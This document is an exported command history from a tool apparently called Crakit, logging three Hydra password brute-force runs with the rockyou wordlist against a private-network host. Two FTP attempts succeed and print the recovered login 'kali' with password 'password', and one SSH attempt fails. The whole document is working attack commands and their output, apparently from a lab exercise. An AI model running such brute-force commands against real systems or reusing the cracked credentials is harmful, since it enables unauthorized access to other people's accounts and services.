========================================
CRAKIT HISTORY EXPORT
Generated: 2025-12-03 00:48:38
Tool: Hydra
Total Entries: 3
========================================

[2025-12-03 00:47:35] SUCCESS (15,01s)
Tool: Hydra
Command: hydra -l kali -P /usr/share/wordlists/rockyou.txt -t 16 192.168.215.2 ftp
Output:
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-02 23:47:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.215.2:21/
[21][ftp] host: 192.168.215.2   misc: (null)   login: kali   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-02 23:47:35

------------------------------------------------------------

[2025-12-03 00:47:48] FAILED (0,69s)
Tool: Hydra
Command: hydra -l kali -P /usr/share/wordlists/rockyou.txt -t 16 192.168.215.2 ssh
Output:
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-02 23:47:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.215.2:22/

------------------------------------------------------------

[2025-12-03 00:48:32] SUCCESS (4,20s)
Tool: Hydra
Command: hydra -l kali -P /usr/share/wordlists/rockyou.txt -t 16 192.168.215.2 ftp
Output:
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-02 23:48:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.215.2:21/
[21][ftp] host: 192.168.215.2   misc: (null)   login: kali   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-02 23:48:32

------------------------------------------------------------


========================================
STATISTICS
========================================
Total commands: 3
Successful: 2 (66,7%)
Failed: 1 (33,3%)
Average execution time: 6,63s
